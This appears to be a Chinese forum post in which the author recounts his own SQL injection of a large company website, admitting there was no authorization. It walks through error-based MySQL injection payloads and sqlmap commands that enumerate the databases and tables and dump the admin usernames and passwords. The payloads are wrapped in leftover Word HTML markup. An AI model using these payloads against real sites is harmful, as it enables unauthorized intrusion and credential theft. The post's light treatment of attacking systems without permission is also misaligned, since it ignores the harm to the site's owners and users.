原文链接:原创 | 记N年前的一次渗透测试!
还记得年少时的梦吗?像朵永远不凋零的花,陪我经过那风吹雨打,看世事无常!看沧桑变化! 今天在整理自己的一些老仓库硬盘,发现自己N年前撸过一个站,好像还是一个大站,xx在线xx分站,废话不说,直接还原当年的步骤,站点我都打码了,毕竟只是一次渗透测试! 当年这个站,还是挺大的,哈哈,好玩的很!现在已经打不开了! 网址:9605b51c5e694c6a596d996c226279c4 网站名称:2b030f6f63f80bf2199e6d0d67275513 常规操作第一步: 扫描,那时候很菜,就直接扫注入。 工具是OWASP ZAP,VEGA 这2个都还好,速度很快 不知道各位师傅听说这些工具没有,那个时代,这些工具是神器! 4个注入点,我随便来一个。就OK了。 注入点:http://xxxx.xxxxx.com.cn/company/shop_list.php?nid=60 Ps:那时候没有授权的这个概念 你们懂了吧~~ MYSQL 手工报错注入+工具注入 先说手工的,咱们来对比学习下。 我们现在看下:显字位 手工的不多说了,5.0以上 直接order by 工具的说下: 我们用burp 代理下,然后联合查询 order by 1-- 在1这里设置字典变量,查看返回信息。 看下图片: 接下来,我们看下数据库信息。其实都知道是5.0的了,那么大的站,5.0以下少。 手工出来的: 查看版本mysql版本 - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)</font></span></p>
上工具:SQLMAP:sqlmap -u url 还是手工的快呀。 咱们继续 我们来手工暴库 : - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</font></span></p>
看到了。 更改的地方在: - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1)</font></span></p>
改成 LIMIT 1,1),LIMIT 2,1) 依次暴库 就OK了 我为了速度,就不一一来了。 工具:SQLMAP sqlmap -u url -dbs 当前数据库: 出来一个16进制的: 70726F64756374 Product 当前库 我们继续爆 我们现在要知道表名了: - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=hex</font><font face="宋体">库名 </font><font face="Calibri">limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</font></span></p>
在表名哪里换上我们前面爆出的库名 61646D696E 是ADMIN的 工具看下: Sqlmap -u url -D 库 -tables 实话实说,我用VPN香港的,SQLMAP速度都非常可观! 接着我们来爆内容: - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</font></span></p>
我们还是更改后面的参数进行爆更多的内容 继续 太多了,直接工具 sqlmap -u url -D 库名 -T 表名 --columns 看到曙光了吧 - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"> </span></p>
提供个格式: - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,</font><font face="宋体">表名</font><font face="Calibri">.</font><font face="宋体">字段</font><font face="Calibri">,0x27,0x7e) from </font><font face="宋体">表名 </font><font face="Calibri">limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"> </span></p>
没问题了吧? 上面是密码,我们来整用户名: 用户名: 密码: 接着工具,很快就出来了。 - <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
- mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
- mso-font-kerning:1.0000pt;"><font face="Calibri">sqlmap -u http://xxxx.xxx.com.cn/company/shop_list.php?nid=60 -D product -T admin -C username,password --dump</font></span></p>
N年前的事情,现在也一样实用,很多大站,注入基本很少了,大家多考虑下逻辑漏洞,说不定,你的SRC奖金又高了。
|
发表于 2022-3-23 09:02:38